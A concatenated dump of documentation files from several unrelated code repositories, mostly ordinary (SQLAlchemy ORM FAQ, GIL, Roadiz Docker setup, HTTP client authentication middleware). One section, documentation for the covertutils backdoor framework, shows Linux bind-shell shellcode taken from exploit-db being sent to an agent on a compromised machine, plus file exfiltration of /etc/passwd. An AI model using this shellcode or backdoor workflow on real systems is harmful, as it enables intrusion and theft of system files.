Sky Survey <http://www.sdss.org>`_.
* Free software: MIT license
* Documentation: https://bossdata.readthedocs.org
* Releases: https://pypi.python.org/pypi/bossdata
* Code: https://github.com/dkirkby/bossdata
| 32.833333 | 76 | 0.711929 |
f702de43c88ac99d53bc5218a9130293ef4018c7 | 500 | rst | reStructuredText | Resources/doc/codeigniter.rst | CyrilleHugues/TheodoEvolutionLegacyWrapperBundle | c00c3b6b88f7ac256614d2582e493c5324723baf | [
"MIT"
] | null | null | null | Resources/doc/codeigniter.rst | CyrilleHugues/TheodoEvolutionLegacyWrapperBundle | c00c3b6b88f7ac256614d2582e493c5324723baf | [
"MIT"
] | null | null | null | Resources/doc/codeigniter.rst | CyrilleHugues/TheodoEvolutionLegacyWrapperBundle | c00c3b6b88f7ac256614d2582e493c5324723baf | [
"MIT"
] | null | null | null | Wrap CodeIgniter
=================
Here is the basic configuration for a CodeIgniter application:
::
theodo_evolution_legacy_wrapper:
root_dir: %kernel.root_dir%/../legacy
class_loader_id: theodo_evolution_legacy_wrapper.autoload.codeigniter_class_loader
kernel:
id: theodo_evolution_legacy_wrapper.legacy_kernel.codeigniter
options:
environment: %kernel.environment%
version: '2.1.2'
core: false
| 29.411765 | 90 | 0.644 |
7411d782d3c8a597b1e83d062c4ee185889ebbee | 7,048 | rst | reStructuredText | covertutils/docs/stages.rst | aidden-laoch/sabre | 0940aa51dfc5074291df9d29db827ddb4010566d | [
"MIT"
] | 2 | 2020-11-23T23:54:32.000Z | 2021-05-25T12:28:05.000Z | covertutils/docs/stages.rst | aidden-laoch/sabre | 0940aa51dfc5074291df9d29db827ddb4010566d | [
"MIT"
] | 1 | 2021-03-20T05:43:02.000Z | 2021-03-20T05:43:02.000Z | covertutils/docs/stages.rst | aidden-laoch/sabre | 0940aa51dfc5074291df9d29db827ddb4010566d | [
"MIT"
] | null | null | null |
.. _stages_page:
Beyond the OS Shell
===================
The ``covertutils`` package has an API for creating custom stages that can be dynamically loaded to compromised machines.
If a :class:`covertutils.handlers.stageable.StageableHandler` is running in a pwned machine stages can be pushed to it.
The API is fully documented in the :ref:`stage_api_page` page.
.. _pythonapi-stage:
The `Python` Stage
------------------
A Python shell with access to all internals is available.
The sent code runs directly in the `covertutils stage API`,
so it is able to access the ``storage`` and ``storage['COMMON']`` dictionaries and change internals objects at runtime.
.. code:: bash
(127.0.0.1:49550)>
(127.0.0.1:49550)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[99] - EXIT
Select stream: 1
[python] >>>
[python] >>> print "Python module with access to the Stager API"
[python] >>> Python module with access to the Stager API
[python] >>> @
No special command specified!
Available special commands:
@clear
@show
@storage
@send
@pyload
[python] >>> @storage
[python] >>> {'COMMON': {'handler': <covertutils.handlers.impl.standardshell.StandardShellHandler object at 0x7f6d472c9490>},
'on': True,
'queue': <Queue.Queue instance at 0x7f6d47066b90>}
[python] >>> if "indentation is found" :
[python] ... print "The whole code block gets transmitted!"
[python] ...
[python] >>> The whole code block gets transmitted!
[python] >>>
[python] >>> print "@pyload command loads python files"
[python] >>> @pyload command loads python files
[python] >>> @pyload /tmp/pycode.py
Buffer cleared!
File '/tmp/pycode.py' loaded!
[python] >>> @show
====================
print "This code exists in a file"
====================
[python] >>>
[python] >>> This code exists in a file
[python] >>>
(127.0.0.1:49550)>
The `Shellcode` Stages
----------------------
When one can directly run stuff in a process, why not run some `shellcode` too?
And do it **directly from memory** please!
Runnning `shellcode` requires the following things:
- Acquiring the shellcode!
- Copying it to memory, to a known memory location
- Making that location executable at runtime
- ``jmp`` ing to that location
So ``covertutils`` has 2 `stages` that utilize ``ctypes`` built-in package to do the right things and finally run `shellcode`!
They are located under :mod:`covertutils.payloads.linux.shellcode` and :mod:`covertutils.payloads.windows.shellcode`.
A `SubShell` is also available that translates copy-pasted `shellcodes` from various sources to raw data, before sending them over to a poor `Agent`.
.. code:: bash
(127.0.0.1:51038)> !stage mload covertutils.payloads.linux.shellcode
shellcode
(127.0.0.1:51038)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[ 3] - shellcode
[ 4] - stage
[99] - EXIT
Select stream: 3
This shell will properly format shellcode
pasted from sources like "exploit-db.com" and "msfvenom"
[shellcode]>
[shellcode]>
[shellcode]> unsigned char code[]= \
Type 'GO' when done pasting...
[shellcode]> "\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
Type 'GO' when done pasting...
[shellcode]> "\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
Type 'GO' when done pasting...
[shellcode]> "\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
Type 'GO' when done pasting...
[shellcode]> "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
Type 'GO' when done pasting...
[shellcode]> "\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";
Type 'GO' when done pasting...
[shellcode]>
[shellcode]> GO
Type 'GO' when done pasting...
====================
Pasted lines:
unsigned char code[]= \
"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
"\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";
Length of 75 bytes
Shellcode in HEX :
6a6658995343536a0289e1cd805b5e526668115c526a026a10515089e1b066cd80894104b304b066cd8043b066cd809359b03fcd804979f9682f2f7368682f62696e89e35089e1b00bcd80
Shellcode in BINARY :
jfX�SCSj��̀[^Rfh\RjjQP���f̀�A��f̀C�f̀�Y�?̀Iy�h//shh/bin��P���
====================
Send the shellcode over? [y/N] y
[shellcode]>
* The `shellcode` used in the demo is taken from https://www.exploit-db.com/exploits/42254/
Oh, and on more thing! `Shellcodes` do no need to be `Null Free` (of course!). The string termination is on Python, and they are transmitted **encrypted by design** anyway.
The `File` Stage
------------------
What good is a backdoor if you can't use it to **leak files**? Or even upload executables and that kind of stuff.
Actually, after the first smile when the pure `netcat reverse shell oneliner` returns, doing stuff with it becomes a pain really fast.
And the next step is trying to ``wget`` stuff with the non-tty shell, or copy-pasting `Base64 encoded` files from the screen.
Miserable things happen when there aren't specific commands for file upload/download to the compromised system. And out-of-band methods (`pastebin`, `wget`, etc) can easily be identified as abnormal...
The ``covertutils`` package has a `file` stage and subshell, to provide file transfers from the `Agent` to the `Handler` and vice-versa in an in-band manner (using the same `Communication Channel`).
.. code:: bash
(127.0.0.1:56402)>
Available Streams:
[ 0] - control
[ 1] - python
[ 2] - os-shell
[ 3] - file
[ 4] - stage
[99] - EXIT
Select stream: 3
=|file]> ~ help download
download <remote-file> [<location>]
=|file]> ~
=|file]> ~ download /etc/passwd
=|file]> ~ File downloaded!
=|file]> ~ download /etc/passwd renamed.txt
=|file]> ~ File downloaded!
=|file]> ~ help upload
upload <local-file> [<remote-location>]
=|file]> ~
=|file]> ~ upload /etc/passwd myusers
=|file]> ~ File uploaded succesfully!
=|file]> ~
=|file]> ~ upload /etc/passwd
=|file]> ~ File uploaded succesfully!
.. warning:: Providing file transfer `in-band` is a double-edged knife.
If the `Communication Channel` is a TCP connection then files will flow around nicely (taking also advantage of the embedded compression, see: :ref:`compressor_component` ).
But if the `Communication Channel` is a `covert TCP backdoor` or such `super-low-bandwidth` channel, a 1MB file will `take forever to download`, taking over the whole channel. An out-of-band approach should be considered in this case.
.. warning:: Transfer of files can trigger the :class:`StreamIdentifier`'s `Birthday Problem` (TODO: document it) destroying 1 or more `streams` (the `control stream` should still work to ``!control reset`` the connection). For heavy use of file transferring, a bigger ``tag_length`` should be used on the :class:`Orchestrator` passed to the :class:`Handler` object.
| 31.891403 | 366 | 0.692111 |
73b94ea4230e4cf2e2775211297e67f3ac35fd3e | 571 | rst | reStructuredText | docs/source/elliot/elliot.evaluation.metrics.coverage.num_retrieved.rst | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 175 | 2021-03-04T15:46:25.000Z | 2022-03-31T05:56:58.000Z | docs/source/elliot/elliot.evaluation.metrics.coverage.num_retrieved.rst | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 15 | 2021-03-06T17:53:56.000Z | 2022-03-24T17:02:07.000Z | docs/source/elliot/elliot.evaluation.metrics.coverage.num_retrieved.rst | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 39 | 2021-03-04T15:46:26.000Z | 2022-03-09T15:37:12.000Z | elliot.evaluation.metrics.coverage.num\_retrieved package
=========================================================
Submodules
----------
elliot.evaluation.metrics.coverage.num\_retrieved.num\_retrieved module
-----------------------------------------------------------------------
.. automodule:: elliot.evaluation.metrics.coverage.num_retrieved.num_retrieved
:members:
:undoc-members:
:show-inheritance:
Module contents
---------------
.. automodule:: elliot.evaluation.metrics.coverage.num_retrieved
:members:
:undoc-members:
:show-inheritance:
| 25.954545 | 78 | 0.57268 |
b0681d22b539a956127dae593e23df84f5cb71d5 | 434 | rst | reStructuredText | about.rst | Cuder/elevator-guide | 875cb330f2f2802660d1010a2671bec958386435 | [
"MIT"
] | null | null | null | about.rst | Cuder/elevator-guide | 875cb330f2f2802660d1010a2671bec958386435 | [
"MIT"
] | null | null | null | about.rst | Cuder/elevator-guide | 875cb330f2f2802660d1010a2671bec958386435 | [
"MIT"
] | null | null | null | About DenvEL-4500
=================
DenvEL-4500 is a modern high-speed passenger elevator. It carries people between floors of a public or residential building.
DenvEL-4500 consists of two main components:
* The car—a cabin for passengers
* The hoistway—a shaft in which the car moves up and down
.. toctree::
:maxdepth: 2
:caption: In this section
technical-characteristics
why
entrance
car
control-panel
| 22.842105 | 124 | 0.714286 |
9ed6b3843bf537efde95c1cf63435995b8b352a5 | 2,776 | rst | reStructuredText | docs/source/index.rst | rlluo1/SET | 20625a3fa528b75a1ffe8794ecb9b9d0557d363f | [
"NASA-1.3"
] | 10 | 2018-01-08T22:09:24.000Z | 2020-12-16T00:57:06.000Z | docs/source/index.rst | rlluo1/SET | 20625a3fa528b75a1ffe8794ecb9b9d0557d363f | [
"NASA-1.3"
] | 7 | 2018-01-09T20:05:51.000Z | 2019-09-05T19:12:49.000Z | docs/source/index.rst | rlluo1/SET | 20625a3fa528b75a1ffe8794ecb9b9d0557d363f | [
"NASA-1.3"
] | 5 | 2018-08-07T15:18:09.000Z | 2021-05-12T19:33:52.000Z | .. Skyglow documentation master file, created by
sphinx-quickstart on Fri Jun 30 20:51:36 2017.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
==============================
**Skyglow Estimation Toolbox**
==============================
*Current Version: v0.0.1*
.. figure:: _static/website_image.png
:scale: 25%
:align: right
:figwidth: 500
*Summer 2017 Wyoming Cross-Cutting II Team Website Image. Teton Range, WY, displayed below a processed artificial skyglow map around Grand Teton National Park, generated from a nine-month composite image.*
Skyglow is the brightening of the sky caused by various illuminated sources, including anthropogenic lighting, atmospheric factors, and celestial light. With the unprecedented growth of urbanization, artificial lighting has been rapidly increasing the brightness of the night sky around the world. This problem has attracted serious concerns from researchers, scientists, and communities to address the ramifications of what is now known as light pollution.
Previously the impact of light pollution on sky brightness was measured by handheld Sky Quality Meters and observations from the Defense Meteorological Satellite Program (DMSP) Operational Linescan System. Both have observational flaws: the Sky Quality Meter is limited in range and feasibility, the DMSP sensor in resolution.
To refine these measurements, the Wyoming Cross-Cutting team at the NASA DEVELOP National Program created the Skyglow Estimation Toolbox (SET) in partnership with the National Park Service and Wyoming Stargazing. The Toolbox is written in Python 2.7 and takes satellite measurements from NASA and NOAA's Suomi National Polar-orbiting Partnership (NPP) Visible Infrared Imaging Radiometer Suite (VIIRS) satellite sensor to map images of skyglow using local parameters. Researchers using the Toolbox can identify sources of light pollution with far greater precision by factoring in light scattering at different viewing angles and apply SET's propagation model to varying locations.
All the Toolbox's user and developer documentation can be found on this website. End-users can refer to the navigation bar's "Index" at the top of the page to find information on installing, running, and generating skyglow maps. Likewise, developers looking to contribute to the documentation or program can find guidelines through the index. Thank you for visiting!
.. figure:: _static/suominpp.png
:scale: 35%
:align: right
**Contents**
------------
.. toctree::
:maxdepth: 2
overview
usr/installation
usr/tutorial
method
.. toctree::
:maxdepth: 2
dev/dev
dev/site
.. toctree::
:maxdepth: 2
trouble/faq
trouble/contact
| 52.377358 | 681 | 0.768012 |
2a52bd6fa19e09fa6e593c4ee1c7e8eac6ad19e6 | 1,997 | rst | reStructuredText | doc/index.rst | harsh-4/gil | 6da59cc3351e5657275d3a536e0b6e7a1b6ac738 | [
"BSL-1.0"
] | null | null | null | doc/index.rst | harsh-4/gil | 6da59cc3351e5657275d3a536e0b6e7a1b6ac738 | [
"BSL-1.0"
] | null | null | null | doc/index.rst | harsh-4/gil | 6da59cc3351e5657275d3a536e0b6e7a1b6ac738 | [
"BSL-1.0"
] | null | null | null | Boost Generic Image Library
===========================
The Generic Image Library (GIL) is a C++11 header-only library that abstracts image
representations from algorithms and allows writing code that can work on
a variety of images with performance similar to hand-writing for a specific
image type.
Quickstart
----------
.. toctree::
:maxdepth: 1
installation
tutorial/video
tutorial/histogram
tutorial/gradient
naming
Core Library Documentation
--------------------------
.. toctree::
:maxdepth: 2
design/index
image_processing/index
API Reference <./reference/index.html#://>
Extensions Documentation
------------------------
.. toctree::
:maxdepth: 2
io
toolbox
numeric
Examples
--------
* :download:`x_gradient.cpp <../example/x_gradient.cpp>`:
Writing an algorithm that operates on generic images
* :download:`dynamic_image.cpp <../example/dynamic_image.cpp>`:
Using images whose properties (color space, channel type) are specified
at run time
* :download:`histogram.cpp <../example/histogram.cpp>`: Creating a histogram
* :download:`interleaved_ptr.cpp <../example/interleaved_ptr.cpp>`,
:download:`interleaved_ptr.hpp <../example/interleaved_ptr.hpp>`,
:download:`interleaved_ref.hpp <../example/interleaved_ref.hpp>`:
Creating your own pixel reference and pixel iterator
* :download:`mandelbrot.cpp <../example/mandelbrot.cpp>`:
Creating a synthetic image defined by a function
* :download:`packed_pixel.cpp <../example/packed_pixel.cpp>`:
Defining bitmasks and images whose channels or pixels are not byte-aligned
* :download:`resize.cpp <../example/resize.cpp>`:
Rescaling an image using bilinear sampling (requires the optional
Numeric extension)
* :download:`affine.cpp <../example/affine.cpp>`:
Applying an affine transformation to an image (requires the optional
Numeric extension)
* :download:`convolution.cpp <../example/convolution.cpp>`:
Blurring images (requires the optional Numeric extension)
| 30.257576 | 83 | 0.715573 |
e95693bbe9b44f52ea80640f7813361b157a06d6 | 308 | rst | reStructuredText | docs/source2/generated/generated/statsmodels.tsa.regime_switching.markov_autoregression.MarkovAutoregression.param_names.rst | GreatWei/pythonStates | c4a9b326bfa312e2ae44a70f4dfaaf91f2d47a37 | [
"BSD-3-Clause"
] | 76 | 2019-12-28T08:37:10.000Z | 2022-03-29T02:19:41.000Z | docs/source2/generated/generated/statsmodels.tsa.regime_switching.markov_autoregression.MarkovAutoregression.param_names.rst | cluterdidiw/statsmodels | 543037fa5768be773a3ba31fba06e16a9edea46a | [
"BSD-3-Clause"
] | 11 | 2015-07-22T22:11:59.000Z | 2020-10-09T08:02:15.000Z | docs/source2/generated/generated/statsmodels.tsa.regime_switching.markov_autoregression.MarkovAutoregression.param_names.rst | cluterdidiw/statsmodels | 543037fa5768be773a3ba31fba06e16a9edea46a | [
"BSD-3-Clause"
] | 35 | 2020-02-04T14:46:25.000Z | 2022-03-24T03:56:17.000Z | statsmodels.tsa.regime\_switching.markov\_autoregression.MarkovAutoregression.param\_names
==========================================================================================
.. currentmodule:: statsmodels.tsa.regime_switching.markov_autoregression
.. autoproperty:: MarkovAutoregression.param_names | 51.333333 | 90 | 0.613636 |
d33046685f84782c1e161f7cc596107cbd0ac9bb | 14,177 | rst | reStructuredText | doc/build/faq/ormconfiguration.rst | sqlalchemy-bot/sqlalchemy | c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7 | [
"MIT"
] | null | null | null | doc/build/faq/ormconfiguration.rst | sqlalchemy-bot/sqlalchemy | c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7 | [
"MIT"
] | null | null | null | doc/build/faq/ormconfiguration.rst | sqlalchemy-bot/sqlalchemy | c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7 | [
"MIT"
] | 1 | 2022-02-28T20:16:29.000Z | 2022-02-28T20:16:29.000Z | ORM Configuration
=================
.. contents::
:local:
:class: faq
:backlinks: none
.. _faq_mapper_primary_key:
How do I map a table that has no primary key?
---------------------------------------------
The SQLAlchemy ORM, in order to map to a particular table, needs there to be
at least one column denoted as a primary key column; multiple-column,
i.e. composite, primary keys are of course entirely feasible as well. These
columns do **not** need to be actually known to the database as primary key
columns, though it's a good idea that they are. It's only necessary that the columns
*behave* as a primary key does, e.g. as a unique and not nullable identifier
for a row.
Most ORMs require that objects have some kind of primary key defined
because the object in memory must correspond to a uniquely identifiable
row in the database table; at the very least, this allows the
object can be targeted for UPDATE and DELETE statements which will affect only
that object's row and no other. However, the importance of the primary key
goes far beyond that. In SQLAlchemy, all ORM-mapped objects are at all times
linked uniquely within a :class:`.Session`
to their specific database row using a pattern called the :term:`identity map`,
a pattern that's central to the unit of work system employed by SQLAlchemy,
and is also key to the most common (and not-so-common) patterns of ORM usage.
.. note::
It's important to note that we're only talking about the SQLAlchemy ORM; an
application which builds on Core and deals only with :class:`_schema.Table` objects,
:func:`_expression.select` constructs and the like, **does not** need any primary key
to be present on or associated with a table in any way (though again, in SQL, all tables
should really have some kind of primary key, lest you need to actually
update or delete specific rows).
In almost all cases, a table does have a so-called :term:`candidate key`, which is a column or series
of columns that uniquely identify a row. If a table truly doesn't have this, and has actual
fully duplicate rows, the table is not corresponding to `first normal form <https://en.wikipedia.org/wiki/First_normal_form>`_ and cannot be mapped. Otherwise, whatever columns comprise the best candidate key can be
applied directly to the mapper::
class SomeClass(Base):
__table__ = some_table_with_no_pk
__mapper_args__ = {
'primary_key':[some_table_with_no_pk.c.uid, some_table_with_no_pk.c.bar]
}
Better yet is when using fully declared table metadata, use the ``primary_key=True``
flag on those columns::
class SomeClass(Base):
__tablename__ = "some_table_with_no_pk"
uid = Column(Integer, primary_key=True)
bar = Column(String, primary_key=True)
All tables in a relational database should have primary keys. Even a many-to-many
association table - the primary key would be the composite of the two association
columns::
CREATE TABLE my_association (
user_id INTEGER REFERENCES user(id),
account_id INTEGER REFERENCES account(id),
PRIMARY KEY (user_id, account_id)
)
How do I configure a Column that is a Python reserved word or similar?
----------------------------------------------------------------------
Column-based attributes can be given any name desired in the mapping. See
:ref:`mapper_column_distinct_names`.
How do I get a list of all columns, relationships, mapped attributes, etc. given a mapped class?
-------------------------------------------------------------------------------------------------
This information is all available from the :class:`_orm.Mapper` object.
To get at the :class:`_orm.Mapper` for a particular mapped class, call the
:func:`_sa.inspect` function on it::
from sqlalchemy import inspect
mapper = inspect(MyClass)
From there, all information about the class can be accessed through properties
such as:
* :attr:`_orm.Mapper.attrs` - a namespace of all mapped attributes. The attributes
themselves are instances of :class:`.MapperProperty`, which contain additional
attributes that can lead to the mapped SQL expression or column, if applicable.
* :attr:`_orm.Mapper.column_attrs` - the mapped attribute namespace
limited to column and SQL expression attributes. You might want to use
:attr:`_orm.Mapper.columns` to get at the :class:`_schema.Column` objects directly.
* :attr:`_orm.Mapper.relationships` - namespace of all :class:`.RelationshipProperty` attributes.
* :attr:`_orm.Mapper.all_orm_descriptors` - namespace of all mapped attributes, plus user-defined
attributes defined using systems such as :class:`.hybrid_property`, :class:`.AssociationProxy` and others.
* :attr:`_orm.Mapper.columns` - A namespace of :class:`_schema.Column` objects and other named
SQL expressions associated with the mapping.
* :attr:`_orm.Mapper.mapped_table` - The :class:`_schema.Table` or other selectable to which
this mapper is mapped.
* :attr:`_orm.Mapper.local_table` - The :class:`_schema.Table` that is "local" to this mapper;
this differs from :attr:`_orm.Mapper.mapped_table` in the case of a mapper mapped
using inheritance to a composed selectable.
.. _faq_combining_columns:
I'm getting a warning or error about "Implicitly combining column X under attribute Y"
--------------------------------------------------------------------------------------
This condition refers to when a mapping contains two columns that are being
mapped under the same attribute name due to their name, but there's no indication
that this is intentional. A mapped class needs to have explicit names for
every attribute that is to store an independent value; when two columns have the
same name and aren't disambiguated, they fall under the same attribute and
the effect is that the value from one column is **copied** into the other, based
on which column was assigned to the attribute first.
This behavior is often desirable and is allowed without warning in the case
where the two columns are linked together via a foreign key relationship
within an inheritance mapping. When the warning or exception occurs, the
issue can be resolved by either assigning the columns to differently-named
attributes, or if combining them together is desired, by using
:func:`.column_property` to make this explicit.
Given the example as follows::
from sqlalchemy import Integer, Column, ForeignKey
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
id = Column(Integer, primary_key=True)
a_id = Column(Integer, ForeignKey('a.id'))
As of SQLAlchemy version 0.9.5, the above condition is detected, and will
warn that the ``id`` column of ``A`` and ``B`` is being combined under
the same-named attribute ``id``, which above is a serious issue since it means
that a ``B`` object's primary key will always mirror that of its ``A``.
A mapping which resolves this is as follows::
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
b_id = Column('id', Integer, primary_key=True)
a_id = Column(Integer, ForeignKey('a.id'))
Suppose we did want ``A.id`` and ``B.id`` to be mirrors of each other, despite
the fact that ``B.a_id`` is where ``A.id`` is related. We could combine
them together using :func:`.column_property`::
class A(Base):
__tablename__ = 'a'
id = Column(Integer, primary_key=True)
class B(A):
__tablename__ = 'b'
# probably not what you want, but this is a demonstration
id = column_property(Column(Integer, primary_key=True), A.id)
a_id = Column(Integer, ForeignKey('a.id'))
I'm using Declarative and setting primaryjoin/secondaryjoin using an ``and_()`` or ``or_()``, and I am getting an error message about foreign keys.
------------------------------------------------------------------------------------------------------------------------------------------------------------------
Are you doing this?::
class MyClass(Base):
# ....
foo = relationship("Dest", primaryjoin=and_("MyClass.id==Dest.foo_id", "MyClass.foo==Dest.bar"))
That's an ``and_()`` of two string expressions, which SQLAlchemy cannot apply any mapping towards. Declarative allows :func:`_orm.relationship` arguments to be specified as strings, which are converted into expression objects using ``eval()``. But this doesn't occur inside of an ``and_()`` expression - it's a special operation declarative applies only to the *entirety* of what's passed to primaryjoin or other arguments as a string::
class MyClass(Base):
# ....
foo = relationship("Dest", primaryjoin="and_(MyClass.id==Dest.foo_id, MyClass.foo==Dest.bar)")
Or if the objects you need are already available, skip the strings::
class MyClass(Base):
# ....
foo = relationship(Dest, primaryjoin=and_(MyClass.id==Dest.foo_id, MyClass.foo==Dest.bar))
The same idea applies to all the other arguments, such as ``foreign_keys``::
# wrong !
foo = relationship(Dest, foreign_keys=["Dest.foo_id", "Dest.bar_id"])
# correct !
foo = relationship(Dest, foreign_keys="[Dest.foo_id, Dest.bar_id]")
# also correct !
foo = relationship(Dest, foreign_keys=[Dest.foo_id, Dest.bar_id])
# if you're using columns from the class that you're inside of, just use the column objects !
class MyClass(Base):
foo_id = Column(...)
bar_id = Column(...)
# ...
foo = relationship(Dest, foreign_keys=[foo_id, bar_id])
.. _faq_subqueryload_limit_sort:
Why is ``ORDER BY`` recommended with ``LIMIT`` (especially with ``subqueryload()``)?
------------------------------------------------------------------------------------
When ORDER BY is not used for a SELECT statement that returns rows, the
relational database is free to returned matched rows in any arbitrary
order. While this ordering very often corresponds to the natural
order of rows within a table, this is not the case for all databases and all
queries. The consequence of this is that any query that limits rows using
``LIMIT`` or ``OFFSET``, or which merely selects the first row of the result,
discarding the rest, will not be deterministic in terms of what result row is
returned, assuming there's more than one row that matches the query's criteria.
While we may not notice this for simple queries on databases that usually
returns rows in their natural order, it becomes more of an issue if we
also use :func:`_orm.subqueryload` to load related collections, and we may not
be loading the collections as intended.
SQLAlchemy implements :func:`_orm.subqueryload` by issuing a separate query,
the results of which are matched up to the results from the first query.
We see two queries emitted like this:
.. sourcecode:: python+sql
>>> session.scalars(select(User).options(subqueryload(User.addresses))).all()
{opensql}-- the "main" query
SELECT users.id AS users_id
FROM users
{stop}
{opensql}-- the "load" query issued by subqueryload
SELECT addresses.id AS addresses_id,
addresses.user_id AS addresses_user_id,
anon_1.users_id AS anon_1_users_id
FROM (SELECT users.id AS users_id FROM users) AS anon_1
JOIN addresses ON anon_1.users_id = addresses.user_id
ORDER BY anon_1.users_id
The second query embeds the first query as a source of rows.
When the inner query uses ``OFFSET`` and/or ``LIMIT`` without ordering,
the two queries may not see the same results:
.. sourcecode:: python+sql
>>> user = session.scalars(select(User).options(subqueryload(User.addresses)).limit(1)).first()
{opensql}-- the "main" query
SELECT users.id AS users_id
FROM users
LIMIT 1
{stop}
{opensql}-- the "load" query issued by subqueryload
SELECT addresses.id AS addresses_id,
addresses.user_id AS addresses_user_id,
anon_1.users_id AS anon_1_users_id
FROM (SELECT users.id AS users_id FROM users LIMIT 1) AS anon_1
JOIN addresses ON anon_1.users_id = addresses.user_id
ORDER BY anon_1.users_id
Depending on database specifics, there is
a chance we may get a result like the following for the two queries::
-- query #1
+--------+
|users_id|
+--------+
| 1|
+--------+
-- query #2
+------------+-----------------+---------------+
|addresses_id|addresses_user_id|anon_1_users_id|
+------------+-----------------+---------------+
| 3| 2| 2|
+------------+-----------------+---------------+
| 4| 2| 2|
+------------+-----------------+---------------+
Above, we receive two ``addresses`` rows for ``user.id`` of 2, and none for
1. We've wasted two rows and failed to actually load the collection. This
is an insidious error because without looking at the SQL and the results, the
ORM will not show that there's any issue; if we access the ``addresses``
for the ``User`` we have, it will emit a lazy load for the collection and we
won't see that anything actually went wrong.
The solution to this problem is to always specify a deterministic sort order,
so that the main query always returns the same set of rows. This generally
means that you should :meth:`_sql.Select.order_by` on a unique column on the table.
The primary key is a good choice for this::
session.scalars(select(User).options(subqueryload(User.addresses)).order_by(User.id).limit(1)).first()
Note that the :func:`_orm.joinedload` eager loader strategy does not suffer from
the same problem because only one query is ever issued, so the load query
cannot be different from the main query. Similarly, the :func:`.selectinload`
eager loader strategy also does not have this issue as it links its collection
loads directly to primary key values just loaded.
.. seealso::
:ref:`subqueryload_ordering`
| 42.319403 | 439 | 0.68597 |
d14023aac7e54a5ddba1d17dd1f101de7d017832 | 1,318 | rst | reStructuredText | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 5 | 2015-04-15T16:09:33.000Z | 2017-04-27T21:16:11.000Z | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 8 | 2015-06-16T13:28:31.000Z | 2019-01-19T10:14:10.000Z | src/developer/first-steps/docker.rst | roadiz/docs | 3400ecc235f69458f3f55f4068b8026070ab63ed | [
"MIT"
] | 7 | 2015-04-28T14:51:50.000Z | 2018-06-14T12:49:12.000Z | .. _docker:
Using Docker for development
============================
Roadiz standard edition is shipped with a ``docker-compose`` example environment ready
to use for development. *Docker* on Linux will provide awesome performances and a production-like environment
without bloating your development machine. Performances won't be as good on *macOS* or *Windows* hosts,
but it will prevent installing singled versioned PHP and MySQL directly on your computer.
First, edit ``.env`` file and configure it according to your host machine (you can copy it from ``.env.dist``
if it does not exist).
.. code-block:: bash
# Build PHP image
docker-compose build;
# Create and start containers
docker-compose up -d;
Then your website will be available at ``http://localhost:${APP_PORT}``.
For linux users, where *Docker* is running natively (without underlying virtualization),
pay attention that *PHP* is running with *www-data* user. You must update your ``.env`` file to
reflect your local user **UID** during image build.
.. code-block:: bash
# Type id command in your favorite terminal app
id
# It should output something like
# uid=1000(toto)
So use the same uid in your `.env` file **before** starting and building your Docker image.
.. code-block:: bash
USER_UID=1000
| 31.380952 | 109 | 0.718513 |
7c7683014d4b048bf6b5c9f81c5f97b9530c497c | 2,019 | rst | reStructuredText | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | 15 | 2022-01-16T15:23:23.000Z | 2022-01-20T21:42:53.000Z | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | 9 | 2022-01-11T19:42:42.000Z | 2022-01-26T20:24:23.000Z | docs/source/user/middleware/authorization.rst | mardiros/blacksmith | c86a870da04b0d916f243cb51f8861529284337d | [
"BSD-3-Clause"
] | null | null | null | .. _`Authentication Middleware`:
Authentication Middleware
=========================
Service may require an authentication to authorize http requests.
The authentication part is not a part of the contract of a route,
but generally for a whole service or even for the whole registry.
For concistency, every service should use the same authorization
pattern.
With blacksmith, the authentication mechanism is declared in the
`AsyncClientFactory` to get the authentication working.
It also can be overridden on every api call.
Example
-------
.. literalinclude:: authorization_bearer.py
In the example above, the bearer token is share for every clients,
of the factory, which is ok for a service like prometheus where the
token is a configuration key, but most of the time, a token depends
on users.
So in the example below, we set the token only on a particular client.
.. literalinclude:: authorization_bearer2.py
In that example, we have a fake web framework that parse the authorization
header and expose the bearer token under a variable ``request.access_token``.
And we provide the middleware only for the execution ot that request.
Create a custom authorization
-----------------------------
Imagine that you have an api that consume a basic authentication header.
.. literalinclude:: authorization_basic.py
Create a custom authentication based on http header
---------------------------------------------------
Imagine that you have an api that consume a "X-Secret" header to validate call.
.. literalinclude:: authorization_custom_header.py
